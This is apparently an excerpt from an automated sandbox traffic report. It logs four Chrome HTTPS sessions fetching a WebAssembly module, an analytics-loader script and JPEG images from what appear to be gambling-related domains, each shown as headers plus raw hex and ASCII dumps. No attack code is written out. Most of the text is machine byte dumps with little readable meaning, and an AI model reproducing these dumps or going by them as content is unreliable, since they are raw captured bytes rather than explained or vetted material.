                                                                                                                                                          329192.168.2.550102188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC577OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC840INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: application/wasm
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                          ETag: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iY%2B%2B%2FkEIyQPcxqh9vH9zLVL7JuFDCqiGmWVxGEg4lqV0v%2BeJcwbQeMx5vR8f%2F8ljklKuaq6aScV6YmjWwJkwpW2lgiU3ZDswblUAVQ8HGAKVjzDEFbSs%2FBxIHjRxcIzoYmjbIIzzPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0a49e0b6b40-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:09 UTC529INData Raw: 65 31 33 0d 0a 00 61 73 6d 01 00 00 00 01 bc 01 1b 60 04 7f 7f 7f 7f 01 7f 60 02 7f 7f 00 60 00 00 60 01 7f 00 60 03 7f 7f 7f 00 60 01 7f 01 7f 60 02 7f 7f 01 7f 60 07 7f 7e 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 00 60 04 7f 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 08 7f 7f 7f 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 03 7f 7e 7f 00 60 02 7f 7e 00 60 00 01 7f 60 03 7f 7f 7f 01 7e 60 01 7e 01 7f 60 00 01 7c 60 03 7f 7f 7f 01 7c 60 05 7f 7e 7f 7f 7f 00 60 06 7e 7f 7f 7f 7f 7f 00 60 06 7f 7e 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 02 7f 7c 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 02 bc 02 0b 03 65 6e 76 0d 72 75 6e 74 69 6d 65 2e 74 69 63 6b 73 00 12 16 77 61 73 69 5f 73 6e 61 70 73 68 6f 74 5f 70 72 65 76 69 65 77 31 08 66 64 5f
                                                                                                                                                          Data Ascii: e13asm````````~``````~`~``~`~`|`|`~`~`~``|``envruntime.tickswasi_snapshot_preview1fd_
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 01 08 05 04 02 04 06 05 05 05 05 05 01 05 01 01 04 0c 02 02 02 08 06 0a 0a 09 08 0a 04 13 10 10 04 06 04 01 0d 0a 0e 01 03 03 02 02 02 00 00 00 05 04 03 00 03 02 03 02 03 01 01 03 02 14 15 11 11 0e 16 01 05 03 0f 03 01 05 07 01 07 07 07 07 07 00 06 09 0f 17 00 02 04 0c 06 0a 03 0b 00 04 00 01 0e 05 09 0c 04 04 05 00 0a 0d 0d 04 18 19 0b 09 05 03 06 06 02 02 02 03 02 03 0f 01 1a 04 05 01 70 01 0b 0b 05 03 01 00 02 06 12 03 7f 01 41 80 80 04 0b 7f 01 41 00 0b 7f 01 41 00 0b 07 cb 01 0d 06 6d 65 6d 6f 72 79 02 00 06 6d 61 6c 6c 6f 63 00 7e 04 66 72 65 65 00 7f 06 63 61 6c 6c 6f 63 00 80 01 07 72 65 61 6c 6c 6f 63 00 81 01 06 5f 73 74 61 72 74 00 82 01 06 72 65 73 75 6d 65 00 83 01 0c 67 6f 5f 73 63 68 65 64 75 6c 65 72 00 84 01 15 61 73 79 6e 63 69 66 79 5f
                                                                                                                                                          Data Ascii: pAAAmemorymalloc~freecallocrealloc_startresumego_schedulerasyncify_
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 20 03 41 20 6a 24 00 0b 0f 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 01 36 02 04 20 04 20 02 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 20 04 20 08 36 02 1c 23 02 23 02 28 02 00 41 20 6a 36 02 00 0b c6 03 01 05 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 24 6b 36 02 00 23 02 28 02 00 22 06 28 02 00 21 00 20 06 28 02 04 21 01 20 06 28 02 08 21 02 20 06 28 02 0c 21 03 20 06 28 02 10 21 04 20 06 28 02 14 21 07 20 06 28 02 18 21 08 20 06 28 02 1c 21 09 20 06 28 02 20 21 06 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 05 0b 23 01 45 04 40 23 00 41 20 6b 22 08 24 00 20 08 42 00
                                                                                                                                                          Data Ascii: A j$!#( 6##(Aj6#(" 6 6 6 6 6 6 6 6##(A j6#AF@##(A$k6#("(! (! (! (! (! (! (! (! ( !#AF@##(Ak6#((!#E@#A k"$ B
                                                                                                                                                          2024-06-09 22:41:09 UTC343INData Raw: ad 05 20 01 36 02 00 20 01 20 07 6b 22 01 41 01 10 54 20 05 20 07 6b 41 02 6a 21 02 03 40 20 02 41 8c ad 05 28 02 00 47 04 40 20 02 41 02 10 54 20 02 41 01 6a 21 02 0c 01 0b 0b 20 01 41 04 74 41 b0 b2 05 6a 22 01 41 00 20 00 fc 0b 00 20 01 0f 0b 0b 20 08 41 03 46 41 01 23 01 1b 04 40 41 cc 87 04 41 0d 10 45 41 03 23 01 41 01 46 0d 04 1a 0b 23 01 45 04 40 00 0b 0b 20 06 41 00 23 01 1b 21 06 0b 23 01 45 04 40 41 8c ad 05 28 02 00 21 03 20 02 21 01 0c 01 0b 0b 00 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 02 36 02 04 20 04 20 01 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 23 02 23 02 28 02 00 41 1c 6a 36 02 00 41 00 0b c4 02 01 04
                                                                                                                                                          Data Ascii: 6 k"AT kAj!@ A(G@ AT Aj! AtAj"A AFA#@AAEA#AF#E@ A#!#E@A(! !!#( 6##(Aj6#(" 6 6 6 6 6 6 6##(Aj6A
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 37 66 66 61 0d 0a 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 23 01 45 04 40 23 00 41 20 6b 22 05 24 00 20 05 42 00 37 02 14 20 05 42 03 37 02 0c 41 b4 ad 05 28 02 00 21 04 41 b4 ad 05 20 05 41 08 6a 22 06 36 02 00 20 05 20 04 36 02 08 0b 20 03 41 00 23 01 1b 45 04 40 20 02 10 0e 41 00 23 01 41 01 46 0d 01 1a 21 06 0b 23 01 45 04 40 20 06 20 01 20 02 fc 0a 00 00 41 b4 ad 05 20 04 36 02 00 20 00 20 02 36 02 04 20 00 20 06 36 02 00 20 05 41 20 6a 24 00 0b 0f 0b 21 03 23 02 28 02 00 20 03 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 03 20 00 36 02 00 20 03 20 01 36 02 04 20 03 20 02 36 02 08 20 03 20 05 36 02 0c 20 03 20 06 36 02 10 20 03 20 04 36 02 14 23 02 23 02 28 02 00 41 18 6a 36 02 00 0b 0b 00 41 12 41 a4 88 04 10 89 01 0b 91
                                                                                                                                                          Data Ascii: 7ffak6#((!#E@#A k"$ B7 B7A(!A Aj"6 6 A#E@ A#AF!#E@ A 6 6 6 A j$!#( 6##(Aj6#(" 6 6 6 6 6 6##(Aj6AA
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 00 0b 0b 20 01 41 00 23 01 1b 45 04 40 20 00 10 14 41 00 23 01 41 01 46 0d 01 1a 21 00 0b 23 01 45 04 40 20 00 2f 01 10 0f 0b 00 0b 21 01 23 02 28 02 00 20 01 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 20 00 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 41 00 0b a0 03 01 03 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 08 6b 36 02 00 23 02 28 02 00 22 01 28 02 00 21 00 20 01 28 02 04 21 01 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 20 01 20 00 45 23 01 1b 21 01 02 40 23 01 45 04 40 20 01 0d 01 20 00 41 03 71 21 01 0b 02 40 02 40 23 01 45 04 40 02 40 02 40 02 40 02 40 20 01 0d 00 41 01 21 01 02 40 02 40 20 00 2d 00 00 41 1f 71 41 01 6b 0e 1a 08 02 08 00 02 04 02 08 00 02 04
                                                                                                                                                          Data Ascii: A#E@ A#AF!#E@ /!#( 6##(Aj6#( 6##(Aj6A#AF@##(Ak6#("(! (!#AF@##(Ak6#((! E#!@#E@ Aq!@@#E@@@@@ A!@@ -AqAk
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 04 40 02 40 20 01 0e 03 00 0a 02 03 0b 20 02 41 28 6a 21 01 0b 20 06 41 03 46 41 01 23 01 1b 04 40 20 01 41 e7 85 04 41 07 20 04 20 09 10 0d 41 03 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 28 22 04 36 02 c4 05 20 02 28 02 2c 21 09 0c 0c 0b 0b 23 01 45 04 40 20 09 45 22 01 0d 09 20 04 2d 00 00 41 3c 47 21 01 0b 02 40 23 01 45 04 40 20 01 0d 01 20 02 41 38 6a 21 01 0b 20 06 41 04 46 41 01 23 01 1b 04 40 20 01 41 ee 85 04 41 06 20 04 20 09 10 0d 41 04 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 38 22 04 36 02 c8 05 20 02 28 02 3c 21 03 20 02 41 30 6a 21 01 0b 20 06 41 05 46 41 01 23 01 1b 04 40 20 01 20 04 20 03 41 f4 85 04 41 01 10 0d 41 05 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 30 22 04 36 02 cc 05 20
                                                                                                                                                          Data Ascii: @@ A(j! AFA#@ AA A#AF#E@ (("6 (,!#E@ E" -A<G!@#E@ A8j! AFA#@ AA A#AF#E@ (8"6 (<! A0j! AFA#@ AAA#AF#E@ (0"6
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 01 21 05 0b 20 06 41 17 46 41 01 23 01 1b 04 40 20 03 41 fe 85 04 41 04 20 04 20 05 10 0d 41 17 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 b0 01 22 04 36 02 a0 06 20 02 41 a8 01 6a 21 03 20 02 28 02 b4 01 21 05 0b 20 06 41 18 46 41 01 23 01 1b 04 40 20 03 20 04 20 05 41 82 86 04 41 01 10 0d 41 18 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a8 01 22 04 36 02 a4 06 20 02 28 02 ac 01 21 09 0b 20 06 41 19 46 41 01 23 01 1b 04 40 20 01 10 17 41 19 23 01 41 01 46 0d 07 1a 21 0b 0b 23 01 45 04 40 20 02 20 0b 36 02 a8 06 20 02 41 a0 01 6a 21 01 0b 20 06 41 1a 46 41 01 23 01 1b 04 40 20 01 20 0b 10 18 41 1a 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a0 01 22 0b 36 02 ac 06 20 02 28 02 a4 01 21 03 20 02 41 98 01 6a
                                                                                                                                                          Data Ascii: ! AFA#@ AA A#AF#E@ ("6 Aj! (! AFA#@ AAA#AF#E@ ("6 (! AFA#@ A#AF!#E@ 6 Aj! AFA#@ A#AF#E@ ("6 (! Aj
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 20 02 28 02 f4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9e 05 20 02 41 9e 05 6a 21 08 20 02 41 e0 01 6a 21 05 0b 20 06 41 27 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 27 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 01 22 04 36 02 80 07 20 09 2d 00 00 41 0f 71 22 0c 41 0f 46 0d 0b 20 02 28 02 e8 01 21 03 20 02 28 02 e4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9f 05 41 01 21 0c 20 02 41 9f 05 6a 21 08 20 02 41 d0 01 6a 21 05 0b 20 06 41 28 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 28 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 d8 01 21 07 20 02 28 02 d4 01 21 08 20 02 28 02 d0 01 21 04 0c 03 0b 0b 23 01 45 04 40 20 02 41 22 3a 00 a0 05 20 02 41 b0 04 6a 21
                                                                                                                                                          Data Ascii: (! Aj-: Aj! Aj! A'FA#@ AA'#AF#E@ ("6 -Aq"AF (! (! Aj-:A! Aj! Aj! A(FA#@ AA(#AF#E@ (! (! (!#E@ A": Aj!
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 01 23 01 1b 04 40 20 03 20 04 41 a6 8d 04 20 08 20 07 41 02 10 1d 41 34 23 01 41 01 46 0d 10 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 03 22 04 36 02 a0 07 20 02 28 02 c8 03 21 07 20 02 28 02 c4 03 21 08 0c 04 0b 0b 20 03 20 02 41 d0 03 6a 23 01 1b 21 03 20 06 41 35 46 41 01 23 01 1b 04 40 20 03 20 04 41 a8 8d 04 20 08 20 07 41 02 10 1d 41 35 23 01 41 01 46 0d 0f 1a 0b 23 01 45 04 40 20 02 20 02 28 02 d0 03 22 04 36 02 a4 07 20 02 28 02 d8 03 21 07 20 02 28 02 d4 03 21 08 0c 03 0b 0b 20 03 20 02 41 e0 03 6a 23 01 1b 21 03 20 06 41 36 46 41 01 23 01 1b 04 40 20 03 20 04 41 aa 8d 04 20 08 20 07 41 02 10 1d 41 36 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 03 22 04 36 02 a8 07 20 02 28 02 e8 03 21 07 20 02 28 02 e4 03 21 08 0c 02 0b 0b 20
                                                                                                                                                          Data Ascii: #@ A AA4#AF#E@ ("6 (! (! Aj#! A5FA#@ A AA5#AF#E@ ("6 (! (! Aj#! A6FA#@ A AA6#AF#E@ ("6 (! (!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          330192.168.2.5500923.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC465OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972860577817 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC576INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          api-elapsed: 9
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding,Accept-Encoding,Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 54ef1d90c22575b90ebdff8d7e91da10.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: I7QsjXxnqYUThZC1734lv2_Hv66CVJZZs-vmXVvwv_LcI1vYUgiwNQ==
                                                                                                                                                          2024-06-09 22:41:10 UTC2722INData Raw: 61 39 62 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: a9b{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:41:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          331192.168.2.55009990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC641OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE10[17],EU-GER-frankfurt-GLOBAL1-CACHE12[0,TCP_HIT,16],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0504b79c5ff3ed4526962e59dcc0d7b2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          332192.168.2.55009190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC645OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[13],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,12],EU-GER-frankfurt-GLOBAL1-CACHE12[17],EU-GER-frankfurt-GLOBAL1-CACHE10[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 18c67d19e0d0e1d25cf75c2a8883edec
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15754INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:10 UTC4273INData Raw: 04 90 0e 23 3a a7 2a 40 9e 74 40 e0 bc 12 6c ec 17 7c 8f 27 6f 22 f1 ac 4c 89 1c d3 ed 3e 39 67 7d c5 23 67 e8 02 fd 06 bd 7a d0 81 eb 40 b9 74 2e 13 89 a8 d7 4b 44 28 9e 74 7d c4 4b 07 28 c3 7d 95 f6 36 ea ca 38 d8 2d 9e 46 38 5d 2d f7 06 96 38 a4 b4 b9 0b e3 ae e8 24 0a 01 ee 8c b4 fa 4e 9b 4b b6 df a0 c1 3f cb df c4 7d 35 1e ee de ed af bc 83 1c eb 2c 1d e7 26 b5 cf d8 70 dc e6 2e ef 2d 3e 65 1f fe 1d c8 5a da 49 23 5e 47 18 7d e4 c6 8a 77 00 11 b7 32 fd 20 ab 03 4d a7 42 b7 56 c8 62 cd d2 a7 1c 7e 1c bf 6f 1c 6b 9a c7 9d 1e 5a 9d 47 87 3f 67 d0 6a 0f 92 fb 73 ca 78 56 54 db c7 c4 72 36 d6 bc a7 f4 70 b7 f7 56 d3 23 5a ba d1 4c 31 23 20 dd e3 0d 58 c0 20 28 24 93 50 34 1e 6d a6 3a ad 3a b1 f0 22 17 9b 1f 6f 33 4e 0b 77 00 8b ca 40 f1 04 6a e4 3f f4 a7
